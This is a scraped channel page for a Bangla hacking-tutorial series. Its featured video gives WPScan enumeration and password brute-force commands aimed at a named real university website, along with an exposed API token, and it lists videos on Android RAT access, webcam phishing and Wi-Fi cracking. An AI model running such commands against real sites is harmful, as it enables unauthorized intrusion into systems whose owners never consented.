Cyber Security Expert
Cyber Security Expert
  • 23
  • 59 571
WordPress Vulnerability Scanning With WPScan || Bangla
In this video I will show you the following things. What is WPScan tool and how WPScan tool works? How to find WordPress websites vulnerabilities and enumerate WordPress website's users? And finally how to brute force WordPress website users passwords? If you like this video, don't forget like share & subscribe.
👉Commands
For Scan
$wpscan --url www.kletech.ac.in --enumerate --api-token axnmEs04btsETVU0Dj1sOBHmafajmNpADomfdAfIMgg
For Brute force
$sudo wpscan --password-attack xmlrpc -t 10 -U admin -P indian-usr.txt --url www.kletech.ac.in
👉 If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will be help to others.
👉 Social networks:
1. Facebook: Cyber-Security-109995281357584
2. Instagram: omizan
3. Tweeter: o_mizan
Thank you for watching.
Mizan
⚠️ Disclaimer: Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.
#kalilinux
#wordpress
#wpscan
Переглядів: 1 032

Відео

WAF Detection With WAFW00F and NMAP - Bangla
Переглядів 4472 роки тому
When a Cyber Secutiry Exper is looking to attack a website or web application, it's best that he detect any defenses before he make his move. Using NMAP and a handy tool called WAFW00F, a Secutity Expert can discover a services firewall and then plan accordingly before running his attack. In this video I ma trying to show you how to use these tools in Kali Linux. 👉 Commands $sudo wafw00f www.pr...
How to remove phone number from truecaller - Bangla
Переглядів 1952 роки тому
In this video i have explain all about Truecaller app, Truecaller app is a very popular app to find unknown contact, Truecaller have many service that's are very popular to people, but it compromise privacy Here I show how to find unknown phone number, edit name, report as spam and unlisted your phone number from Truecaller. 👉 If you face any difficulties please leave a comments here. I will tr...
OSINT with Truecaller in Kali Linux - In Bangla
Переглядів 7 тис.2 роки тому
In this video I try to show how you can find any unknown number details by Truecaller using Kali Linux. Truecaller is a smartphone application that has features of caller-identification, call-blocking, etc. But you can use Truecaller on Kali Linux and find unknown number details and all information like find caller location, caller mail id, caller name, caller picture and so on. 👉 Prerequisite ...
Basics of Ports in Computer Networking - বাংলা
Переглядів 2,7 тис.2 роки тому
What is a ports and what are port numbers? A port is a logical connection that is used by programs and services to exchange information. It specifically determines which program or service on a computer or server that is going to be serve. As a security expert we must know all about the ports. In this video I am trying to describe basic knowledge of ports. #ports #networking #computer 👉 If you ...
Linux Commands that Make you easier to use Kali Linux! - বাংলা
Переглядів 2972 роки тому
Using Linux, there's usually a few ways to accomplish a task. Here are some commands that will change the way you use Linux. Whether you're a Linux newbie or a seasoned SysAdmin, you'll find this video helpful. I try to describe some useful commands and tricks that make task easer for you. #kalilinux #linux #linode 👉 If you face any difficulties please leave a comments here. I will try to solve...
Access any Android Devices Remotely from Kali Linux with L3mon and Portmap - বাংলা ভাষায়
Переглядів 12 тис.2 роки тому
In this video I describe how to access any android device remotely from Kali Linux. Explain how L3mon / Lemon install and configure in Kali Linux. Make apk for Android Phone or Tabs and install on those devices and get access it from remotely. The portmap.io enable us to access Android devices from any networks. #L3mon #android #androidhack #installation #configuration 👉 Commands Install JDK 8 ...
How to install JDK 8 in Kali Linux 2022 - কালী লিনাক্সে JDK 8 ইনস্টলেশন
Переглядів 3,2 тис.2 роки тому
In this video I ma trying to describe how manually install JDK 8 in latest Kali Linux distribution. There are lots of cybersecurity projects and tools are available on the internet. Some of them like L3mon, HaxRAT and other Android RAT tools requires Java 8 OpenJDK 8 in our system. In Kali Linux recent update OpenJDK 8 is removed from Kali Linux repository and only OpenJDK 11 comes with Kali Li...
File Sharing Between Windows and Kali Linux in VMware - বাংলা
Переглядів 1,6 тис.2 роки тому
I have tried to described how file sharing enable between Windows host and Kali Linux as a guest in VMVare environment. Very easy task, you can try it and enjoy! #kalilinux, #filesharing, #fileshare If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or sha...
Generating WordList / Password List with crunch, cupp and mentalist [Bangla]
Переглядів 1,9 тис.2 роки тому
In this video I am trying to show how to generate your own WordList / Password List for penetration test. Here I using three tools for this purpose named Crunch, CUPP and Mentalist. If you have a particular target in mind, then it helps to generate a custom dictionary that is based on the personal information about the target. For example, people are likely to set a password that has their part...
What is SQL injection attack and how can do it? SQL ইনজেকশন আক্রমণ কি ও কিভাবে আপনি এটা করবেন?
Переглядів 12 тис.2 роки тому
I have tried to describe what is SQL Injection attack and how the SQLI attack work. The first session is descriptive and the last session is practical. If you have look whole video you can understand all about SQL injection and can do SQL injection test to your own site. 👉 Some command are used here: 1. Order By [column number] 2. Union Select [ column range] 3. version() 4. concat(tbl_filed,0x...
WIFI WPA handshake capture with Aircrack-ng || বাংলা টিউটোরিয়াল।
Переглядів 4,4 тис.2 роки тому
In this video I'm trying to show how can capture WPA handshake and crack the the password with Aircrack-ng. Here I give the command list so that you can practice it. Please do not user it any illegal activities. 👉 Start of the process Connect the WiFi dongle and check the name of interface. I got the name is wlan0 in my system, you may found different name, note it. $ iwconfig Killing all backg...
Camera access with CamPhish - বাংলা ভাষায়
Переглядів 1,3 тис.2 роки тому
In this video I describe how to install CamPhish in Kali Linux. How to run and hack camera of victim PC or mobile. I hope you can install and test it your own PC. If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will b...
How to exploit browser with BeEF || BeEF দিয়ে ব্রাউজার হ্যাকিং !
Переглядів 4,6 тис.2 роки тому
I this video I try to explain ho to exploit browser with BeEF frame work. after watching this video you can get understand how BeEF install and uses. If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will be help to oth...
Cyber Security for end user || কেন সবার প্রাথমিক cyber security জ্ঞান লাগবে!
Переглядів 2042 роки тому
আমাদের দৈনন্দিন জীবনে কম্পিউটার , ইন্টারনেট ও ইন্টারনেট রিলেটেড সার্ভিস এর ব্যবহার বাড়ছে। সেই সাথে বাড়ছে সাইবার সিকিউরিটি রিস্ক। বিগত বছর গুলোতে আমরা দেখেছি ক্রিমিনালরা অনেক মানুষের বিকাশের টাকা স্ক্যাম করে হাতিয়ে নিয়েছে। এ ছাড়াও ক্রেডিট /ডেবিট কার্ড ও ইন্টারনেট ব্যাংকিং এ ও জালিয়াতির ঘটনা ঘটেছে। ভবিষতে এই রকম ঘটনা আরো বাড়বে। সুতরাং সাইবার সিকিউরিটি এর প্রাথমিক জ্ঞান আমাদের সবার জানা জরুরি হয়ে ...
Kali Linux Tutorials Part 2 || বাংলা টিউটোরিয়াল।
Переглядів 3272 роки тому
Kali Linux Tutorials Part 2 || বাংলা টিউটোরিয়াল।
Kali Linux Tutorials Part 1 || বাংলা টিউটোরিয়াল।
Переглядів 7152 роки тому
Kali Linux Tutorials Part 1 || বাংলা টিউটোরিয়াল।
Remote shell access with nc command || বাংলা টিউটোরিয়াল।
Переглядів 9052 роки тому
Remote shell access with nc command || বাংলা টিউটোরিয়াল।
Burp Suite Installation in Windows and Kali Linux || বাংলা টিউটোরিয়াল।
Переглядів 1,5 тис.2 роки тому
Burp Suite Installation in Windows and Kali Linux || বাংলা টিউটোরিয়াল।
Kali Linux Installation in WMware 16 Pro || বাংলা টিউটোরিয়াল।
Переглядів 2882 роки тому
Kali Linux Installation in WMware 16 Pro || বাংলা টিউটোরিয়াল।
TP-Link TL-WN722N USB WiFi adapter install at Kali Linux || বাংলা টিউটোরিয়াল।
Переглядів 2,2 тис.2 роки тому
TP-Link TL-WN722N USB WiFi adapter install at Kali Linux || বাংলা টিউটোরিয়াল।
SQL Injection How To.
Переглядів 5033 роки тому
SQL Injection How To.
Open Source Intelligence how to.
Переглядів 1573 роки тому
Open Source Intelligence how to.